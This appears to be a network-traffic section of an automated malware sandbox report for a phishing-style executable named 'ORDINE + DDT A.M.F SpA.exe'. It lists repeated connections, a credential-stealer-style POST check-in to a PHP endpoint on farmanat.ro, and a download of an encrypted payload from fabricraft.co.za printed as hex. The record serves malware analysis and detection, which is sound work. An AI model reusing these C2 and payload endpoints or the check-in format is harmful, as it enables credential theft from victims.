                                              842192.168.11.2050690176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              843192.168.11.2050691176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              844192.168.11.2050692176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              845192.168.11.2050693176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              846192.168.11.2050694176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              847192.168.11.2050695176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              848192.168.11.2050696176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              849192.168.11.2050697176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              85192.168.11.2049922176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              850192.168.11.2050698176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              851192.168.11.2050699176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              852192.168.11.2050700176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              853192.168.11.2050701176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              854192.168.11.2050702176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              855192.168.11.2050703176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              856192.168.11.2050704176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              857192.168.11.2050705176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              858192.168.11.2050706176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              859192.168.11.2050707176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              86192.168.11.2049923176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              860192.168.11.2050708176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              861192.168.11.2050709176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              862192.168.11.2050710176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              863192.168.11.2050711176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              864192.168.11.2050712176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              865192.168.11.2050713176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              866192.168.11.2050714176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              867192.168.11.2050715176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              868192.168.11.2050716176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              869192.168.11.2050717176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              87192.168.11.2049924176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              870192.168.11.2050718176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              871192.168.11.2050719176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              872192.168.11.2050720176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              873192.168.11.2050721176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              874192.168.11.2050722176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              875192.168.11.2050723176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              876192.168.11.2050724176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              877192.168.11.2050725176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              878192.168.11.2050726176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              879192.168.11.2050727176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              88192.168.11.2049925176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              89192.168.11.2049926176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              9192.168.11.2049844176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:06.230046034 CET6317OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:06.314524889 CET6318INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              90192.168.11.2049927176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              91192.168.11.2049928176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              92192.168.11.2049929176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              93192.168.11.2049930176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              94192.168.11.2049931176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              95192.168.11.2049932176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              96192.168.11.2049933176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              97192.168.11.2049934176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              98192.168.11.2049935176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              99192.168.11.2049936176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.11.2049816197.242.150.64443C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              2021-11-25 09:47:51 UTC0OUTGET /Farmant_hhVNwJna195.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: fabricraft.co.za
                                              Cache-Control: no-cache
                                              2021-11-25 09:47:52 UTC0INHTTP/1.1 200 OK
                                              Date: Thu, 25 Nov 2021 09:47:52 GMT
                                              Server: Apache
                                              Last-Modified: Thu, 25 Nov 2021 06:28:40 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 106560
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              2021-11-25 09:47:52 UTC0INData Raw: ed 7e 33 eb 0b f2 69 6c a4 98 d3 1b d6 98 37 1d 0c 20 ef 35 e8 89 f1 a3 7c 14 c7 cf a7 4d 4c e8 36 7e d8 3c cd 58 d3 5f 09 57 2e 48 ce a9 39 16 0d 52 f8 98 88 61 3a 2d e3 5b 64 93 4c a9 6d 0c 86 ff aa fd f5 30 7d b5 cd b2 9c f9 c3 d5 57 4c b4 75 04 bc 04 97 ae 74 53 9d 58 ce 61 2f 31 8a e6 bf e3 93 25 c3 df 62 57 45 6f 2a 2f 30 1f c8 c3 e1 2c 16 ef 74 29 5e f0 1f ee bb 72 4a 9a 4a c2 b7 bd 80 5d 1f 1a bc ef 13 b2 80 49 64 aa ec b9 23 69 8f 5b 4d 69 24 15 f9 fa 5e a8 c4 a7 b6 5a 46 e6 9a cf fb 29 ae f4 d0 18 ce 7e 25 97 49 ef a8 e3 9a c4 06 84 9e a5 45 db 8c 94 af 81 6b 37 3b b7 bc fe 89 11 d0 e1 ed 9b 5e ba be 9a 73 ce 69 5c 98 ce de a1 eb c5 33 75 53 df 76 c4 dd 34 2f ca 7c 23 2c 76 f7 88 52 15 90 ec df 96 ea c9 7b 97 b8 f6 cc fe 5b e3 24 9b 35 7f af 15
                                              Data Ascii: ~3il7 5|ML6~<X_W.H9Ra:-[dLm0}WLutSXa/1%bWEo*/0,t)^rJJ]Id#i[Mi$^ZF)~%IEk7;^si\3uSv4/|#,vR{[$5
                                              2021-11-25 09:47:52 UTC8INData Raw: 21 68 b1 cb d4 a1 48 4c 09 ba bc 99 8b cc a9 5f 66 b5 d3 15 ce b9 70 ee 6a 94 11 4a 96 2d 04 7f 52 c9 2c 88 5b 51 e3 c4 b2 3e 77 31 63 92 2b c1 23 9c a9 00 c5 7b 17 56 56 96 c5 e4 37 c9 9c 9a 0e 78 5f c8 c2 7c 58 e4 0b 91 3c 29 49 a9 cc 8c db 0e 4f b8 92 a8 a4 20 ad b1 b6 da c9 e0 79 30 a2 f0 36 95 10 dd 90 86 e8 78 a7 18 76 70 fb 38 9a 32 50 1c 10 fa 59 79 fa c6 df a6 47 60 50 0f a7 be 75 4e 0d 09 82 19 60 ed 1a 51 96 99 9b 35 b6 f2 c8 f2 02 59 d1 64 70 d7 43 62 f2 5c d6 11 38 07 e4 13 ae 33 68 55 1e 54 0d c1 b8 a4 ca 90 62 d7 0d 4b 2d d0 60 31 7c fe 01 50 b9 24 13 92 91 1c 28 fa 54 e4 ae 86 a9 d2 74 0a e2 ee 66 48 63 d9 66 19 d5 d7 73 aa 32 ad 65 e6 47 0c 50 4f fb 64 5c 02 f2 f8 81 b0 e9 73 56 1e 59 fb 13 46 9c 46 8a 12 2f 91 f0 6c 3e 10 1f be f6 a5 f8
                                              Data Ascii: !hHL_fpjJ-R,[Q>w1c+#{VV7x_|X<)IO y06xvp82PYyG`PuN`Q5YdpCb\83hUTbK-`1|P$(TtfHcfs2eGPOd\sVYFF/l>
                                              2021-11-25 09:47:52 UTC15INData Raw: b6 4e db 15 f4 c1 27 a1 f8 14 95 b4 9a 7d f6 9c e9 4e 84 20 58 98 4a 6b ee c1 57 c9 aa 75 a2 75 6b 3a 17 c5 76 29 76 f8 79 08 ec f4 7f a4 49 e6 c9 eb f4 03 a8 96 07 6f 03 a8 5e e4 78 ff 66 0f c2 f8 02 f8 ca 42 9c fb 56 0b da 7e 5f 52 0e 61 a8 0e 03 fc 6f 9f 97 93 f8 e8 f4 99 15 d8 57 dc 3a ab 79 f5 87 87 1a 7f a3 4b 3f c1 a4 46 51 eb aa 4b 9a 3d c3 ae 12 5d 1b b2 24 c8 91 c8 ff a0 8a d5 2c 68 6a 75 b8 d9 14 bc 27 38 d6 1f a6 bb 9b 9c 2d a9 e8 b1 02 ea 0a 12 cb a0 1c 86 ec d9 4a d5 69 60 29 86 8a 7a f3 e7 e3 d7 15 9f 51 aa 66 4e 16 f3 28 43 2f 1a 9c 9f e5 33 db ca a7 0b 72 2f a2 41 06 6a 42 57 b3 ee 04 2c e3 e4 b1 4c 1d 49 b8 db 45 5f 15 55 df ba 9a fb 6c 89 59 c3 47 7a 38 a0 5d 2f 87 21 dc b8 d3 bd 82 c0 c2 e6 f4 1f 3f 3a b3 3a 71 f0 02 42 63 2a 56 7e b0
                                              Data Ascii: N'}N XJkWuuk:v)vyIo^xfBV~_RaoW:yK?FQK=]$,hju'8-Ji`)zQfN(C/3r/AjBW,LIE_UlYGz8]/!?::qBc*V~
                                              2021-11-25 09:47:52 UTC23INData Raw: 1a 32 73 ea 7e 6a 13 e0 7b 55 09 15 32 79 51 18 eb 63 e0 4b eb 5f f9 ed e9 48 19 0b 57 fb 31 47 34 14 bf d7 20 fa f2 7e e4 7d b5 c9 d8 fc 74 79 ae 58 1b cc 1f 04 ec 62 98 bd f1 6f 62 a7 31 89 86 f0 75 19 d5 e3 f9 4d 4e 5a 1e a8 ba 90 b3 7d 60 e0 bd 3f 1e 59 ee bc 9c 49 53 f0 1f 6d 7f aa cf 5a 45 44 30 07 8e 5d 28 2c 71 bb a4 db dc 86 45 fe 6c 70 8c b6 00 a2 57 02 bd 66 1f af 31 44 2c d9 db 2e 66 d4 00 d8 61 88 1c 2b 46 2f 67 3d 65 73 2c 56 9e 1e ad ba 80 8e 97 47 dc 89 dc 6b da 61 94 8e 2a 9c aa 64 28 07 7d ea 85 91 76 f2 6a c2 55 40 36 8c 99 b8 37 43 cf 0a 9e 36 fc 55 da 59 35 09 06 57 df a6 82 60 5a 34 a6 f6 3f 67 73 0b 02 ad 5c d4 e5 f9 a0 f8 7d 2f 0c 91 ed fa 80 d1 96 d7 22 07 5c 87 b3 f5 42 82 cf 78 1a bf 18 21 43 9f b4 1a b2 3a 9e b9 af f0 5f e6 45
                                              Data Ascii: 2s~j{U2yQcK_HW1G4 ~}tyXbob1uMNZ}`?YISmZED0](,qElpWf1D,.fa+F/g=es,VGka*d(}vjU@67C6UY5W`Z4?gs\}/"\Bx!C:_E
                                              2021-11-25 09:47:52 UTC31INData Raw: 89 a1 ab 99 7f 3b a4 81 c8 57 99 7d d3 a2 94 5d 5a 22 8b 84 8d d2 6d c0 7d 9d 53 f0 4c ed 52 ac eb e7 ad 47 a5 0a 43 66 f8 ce 53 7e eb da 06 ba e4 72 27 59 5c 8b 11 14 54 7e bf 89 b3 d2 80 a6 33 41 b0 8a 5e 3a b4 3a 12 0f 7a e1 58 fb e7 f2 b0 97 a5 4d a8 0e 6b b0 ad d2 a5 de 10 9a a0 27 79 58 f5 4c b2 f0 05 eb dc 93 98 fe a0 ab e4 3f ac ac 9a 52 a6 50 0e 6b 50 a9 7a 6f 48 f6 e2 54 62 d4 19 2c 6e a2 20 7b a0 5c 97 51 f9 05 80 c0 0e 2e 26 43 62 ad 74 e9 25 90 e6 55 32 47 10 4a ee ff c0 4f 11 3f 52 18 53 b1 e3 a4 62 14 38 06 92 b0 db 40 2a b9 52 11 32 91 38 c9 8d ef 1d 95 1d a6 fd b0 36 aa b7 88 58 53 6f 9e 58 6c f1 60 c1 bb 96 d9 05 01 1a 7a 02 c2 fe e2 b5 5a 88 b1 88 f6 ae fb 10 be 04 e2 53 cb 2e f0 55 06 0b f0 3c 82 e5 b4 5f ec 9c 66 fa 62 37 30 b9 0b 4a
                                              Data Ascii: ;W}]Z"m}SLRGCfS~r'Y\T~3A^::zXMk'yXL?RPkPzoHTb,n {\Q.&Cbt%U2GJO?RSb8@*R286XSoXl`zZS.U<_fb70J
                                              2021-11-25 09:47:52 UTC39INData Raw: 78 b7 b5 20 50 41 0b f8 be 4c ca fa da b8 3a 74 9a 76 a2 3f 40 d6 ab c4 15 7c a5 60 8e 1e 70 ee 36 77 0e 14 78 a0 ec fc 60 58 9a 47 d9 ae 84 c2 0a 27 48 ea e0 8c 4c ae 40 5d 12 ab 6f 69 a4 8a d4 cd 23 d4 00 29 70 bf 59 a8 5b 32 1c 29 d1 d9 e2 f8 11 83 93 a9 23 07 40 61 2d 31 17 c5 18 23 3a 86 66 25 ad 22 d9 58 53 8d bb 6e 05 b9 0b 0c bd a7 2b 77 a3 71 b6 2e 0f ec 92 80 da 42 98 20 a7 26 a4 bc f1 2f 62 35 f4 95 bd 5e e3 be 21 3c 77 64 9b d9 e0 45 19 20 48 dd 6c 29 c1 a3 9a 3e e8 c4 a1 55 4f af 32 0e 2f 2b fe fd 47 0a 5a de 01 37 c2 95 e4 e0 ae ce ff 1f 47 00 b9 f0 48 24 57 32 d0 17 86 2c e1 43 9c dc b5 81 f6 ed b7 ca 7f 9b 01 2c 5d a9 92 16 80 ee b7 72 f3 00 71 d6 74 ce 03 7c 4c 37 96 4c a7 55 4f 25 66 4c 8d 4e 33 96 85 48 4f 21 15 8c 9c 77 b6 a0 c0 b0 d0
                                              Data Ascii: x PAL:tv?@|`p6wx`XG'HL@]oi#)pY[2)#@a-1#:f%"XSn+wq.B &/b5^!<wdE Hl)>UO2/+GZ7GH$W2,C,]rqt|L7LUO%fLN3HO!w
                                              2021-11-25 09:47:52 UTC47INData Raw: dc 58 26 15 75 31 8a 65 7b ef 50 70 48 33 e3 bb f1 6f 2a 2f 63 49 37 b6 e9 1f e0 28 f1 59 a1 0f e0 f3 17 2a b2 5d cf b8 57 f8 71 8e 13 5b 4f 09 2e cb 33 7b ba b6 f9 ee 5a 8e 7a 55 dd f1 a9 16 93 07 1b 0e ef 49 3f 49 e7 87 38 aa 0d bb 72 c7 1c b1 ab b2 da bd 87 cd 00 c2 73 e5 4a 9c 79 46 00 4b f7 80 23 64 ac be 62 84 04 7b e4 c0 38 f1 cf 73 25 d5 d5 c9 42 68 c8 cf be 80 37 17 0f 8e 4c 31 39 10 7e e2 d0 27 72 14 94 02 89 e5 ab 7d a7 a3 91 cd 06 41 4f 86 92 31 10 03 61 0a 31 27 44 8f 40 59 83 c4 d3 e4 6f 9f 6c 06 ff f5 1a f8 af a0 38 90 b4 ff 93 6f 2a d7 bf f4 0f 4c 2e fa 10 de ff 74 58 5a c6 15 13 e7 fc 92 d5 9a 34 bf 20 fa fe ea f3 e7 bf ca 47 52 2d 42 3f 55 61 3f 78 1c 65 90 7d 73 42 a4 63 f2 31 27 31 2f 4f 37 4f a9 24 84 46 9b d3 23 9a 7f 3b b8 0a 96 0f
                                              Data Ascii: X&u1e{PpH3o*/cI7(Y*]Wq[O.3{ZzUI?I8rsJyFK#db{8s%Bh7L19~'r}AO1a1'D@Yol8o*L.tXZ4 GR-B?Ua?xe}sBc1'1/O7O$F#;
                                              2021-11-25 09:47:52 UTC55INData Raw: c5 c6 4d a8 a6 bf 62 a5 de e1 1e 22 05 e8 93 77 28 41 ba fa 57 37 33 3f 12 5b 08 98 3b 8e 1f 8d 20 e0 f3 51 f0 f5 58 b6 27 53 e8 9a 14 fc 30 6f 26 32 d4 7b 71 f4 f0 9c 04 d5 b8 10 83 ce 0f a8 80 b3 8b 08 85 a5 de e4 2b 01 f3 54 34 09 e1 9d 10 49 47 08 5b f5 7d c9 2e 31 12 6f ed 7f 7f 23 90 1c 03 3f 73 aa 66 39 93 c8 6a ca b7 43 24 6c 37 77 b7 07 09 32 60 de 5c 03 3d 89 2c d9 b6 1b 32 fc ba 97 a1 c3 74 f5 30 a7 10 1b c1 83 89 7e ca ed 97 01 69 b9 0f af cd 33 37 5c 71 f2 94 99 db d3 67 e9 1f 11 e0 e2 7a 0a a1 ca 29 6e 52 cb a6 b6 22 77 a5 f4 88 59 5d ec 9c d6 a4 d3 ae 46 9d 41 14 95 b4 b7 07 68 8f 6c 34 91 d7 58 b7 4f c2 d2 2c 32 b3 bd 82 b5 31 cc af b4 fa a2 6e 16 07 d3 7c 58 c3 d7 48 3f 9c 5c 41 80 10 a1 ad 37 5f dd 93 3a 19 87 00 68 8d ba 7f 74 82 2f 45
                                              Data Ascii: Mb"w(AW73?[; QX'S0o&2{q+T4IG[}.1o#?sf9jC$l7w2`\=,2t0~i37\qgz)nR"wY]FAhl4XO,21n|XH?\A7_:ht/E
                                              2021-11-25 09:47:52 UTC62INData Raw: e8 04 f4 a5 98 ef 2a d4 95 29 15 3b fd 1a 32 b9 df 76 d5 99 e2 10 ee 16 e9 2e bf f8 d5 e2 ae 60 8f fd a8 ff 37 30 99 cd 07 f4 69 60 55 c9 0d c7 12 65 2e f3 0a 39 25 b6 a9 de a1 66 56 37 35 1e da 35 1a d8 0f ce 6b 1d 4d 17 be 32 47 9a 1d 09 66 7e 18 fc a2 1c dd 03 e0 3f a4 d0 b9 f6 01 1a 12 a3 9a 5d b2 2c 32 ab 35 c8 9d aa 5b 87 2e b3 49 cd b5 42 9d cd 55 3b 67 a1 ef 63 7b d7 b1 7b 07 0f 77 ca 8d f5 55 80 b0 50 da 54 59 3c 8f 86 23 15 11 5d b8 1f 40 1f c8 6f 7f ea f2 50 48 d3 30 97 2d 11 c2 be 76 47 ab 73 55 26 e2 f8 cf f9 f0 37 33 7d 12 9c 17 8f ca aa 23 f0 a7 07 d2 53 ef 77 3f 80 30 5e 74 55 fc 8a 1b 13 21 eb 06 31 3c 7d 15 0f 9b d5 67 56 47 5e 95 13 0b 21 7b fd 9c 31 15 69 4d f3 9c 11 3a 30 57 4c 3f b5 87 78 1c d7 6d 21 98 71 32 c4 38 a4 74 82 7f 48 1a
                                              Data Ascii: *);2v.`70i`Ue.9%fV755kM2Gf~?],25[.IBU;gc{{wUPTY<#]@oPH0-vGsU&73}#Sw?0^tU!1<}gVG^!{1iM:0WL?xm!q28tH
                                              2021-11-25 09:47:52 UTC70INData Raw: 2b e6 a8 78 6b 25 c2 bc a6 36 ac 26 99 54 a2 2c dc d7 2c e7 79 26 be 52 c6 3b 64 5f 97 6f 1d e6 f4 76 6b f4 5d 24 f9 80 50 f4 7b 04 83 c3 bd 03 2d f8 ad 34 82 d8 78 de 93 60 ca 4e bd c9 5f 47 18 b7 2e dd f7 6b 1c 3f db 15 f5 55 71 2c 2e be 81 60 5a 5d cc ea c2 98 fe 0d ab bf 28 7e 44 85 b0 db 36 e1 4d e8 66 09 fc 06 99 c9 97 bf ec 92 65 73 f3 7d 2b a2 1e 01 a6 0c 43 e9 36 dd f1 cc 33 b9 e5 4e b3 e6 ed eb 82 38 cd 18 3e c8 39 59 6e c7 5c 74 9a d5 1d 0c 75 0b 12 81 c5 26 54 b9 cd e6 6b 6c 82 8e 34 e3 d2 ca fb 48 a1 3c 9d 08 24 c3 0e ee e1 19 1b 90 c8 77 74 90 45 3d be 24 56 37 22 61 45 23 5a 81 85 5a dd 76 7b f8 7d 09 61 56 db 10 3d 63 1d 52 0e 54 e7 ad 35 5d 06 56 e2 11 60 21 70 db 37 12 4c 4a 50 8c 3c 7f 69 bf 66 80 05 81 29 12 08 36 ad 0f c4 b2 23 f0 d7
                                              Data Ascii: +xk%6&T,,y&R;d_ovk]$P{-4x`N_G.k?Uq,.`Z](~D6Mfes}+C63N8>9Yn\tu&Tkl4H<$wtE=$V7"aE#ZZv{}aV=cRT5]V`!p7LJP<if)6#
                                              2021-11-25 09:47:52 UTC78INData Raw: 2f f2 1a da 59 a5 83 16 fb 33 47 92 1b 17 43 49 bf 91 97 5b 30 05 ca 8a 64 6d 48 a8 52 b9 8b 19 23 1b 09 42 b7 a5 9a 49 8f 49 f4 da ee 36 89 83 86 b1 12 b6 8a 87 c9 a4 ae a7 46 4c 3d 0f 30 2f b9 17 14 86 9c 1b 88 fd a6 4d fe a4 21 00 f9 b3 b7 e2 de 93 06 d2 78 cd d4 c0 a9 52 a1 3e 5e 65 bc 51 ec 15 42 d1 a7 49 1f 9e 1b e9 f8 b9 d5 bc 53 cb d8 cc b1 ff af f0 3c fe c9 11 49 00 09 8e 9d 76 12 dd e7 e0 81 6a 18 07 bf 1b 16 1a 32 35 38 4f b3 09 57 44 1a e8 de c9 69 b5 31 7c 3f f3 63 d4 bb 21 10 26 97 ff 56 7e 73 a9 e6 c9 ee 2c 07 07 d4 ab c6 ab 63 b2 b5 90 0a 23 18 2a e6 88 ef 12 52 29 6d 56 80 40 5d 80 da b5 d5 53 29 1c fc e5 ec 00 77 ab 8e f3 35 49 07 8e 84 73 16 13 ac 3c 34 31 93 a3 39 f1 f9 b5 d1 3d f6 fb a3 09 d1 49 5d 87 28 40 a5 4c 5e ae 42 bf 2b ac c1
                                              Data Ascii: /Y3GCI[0dmHR#BII6FL=0/M!xR>^eQBIS<Ivj258OWDi1|?c!&V~s,c#*R)mV@]S)w5Is<419=I](@L^B+
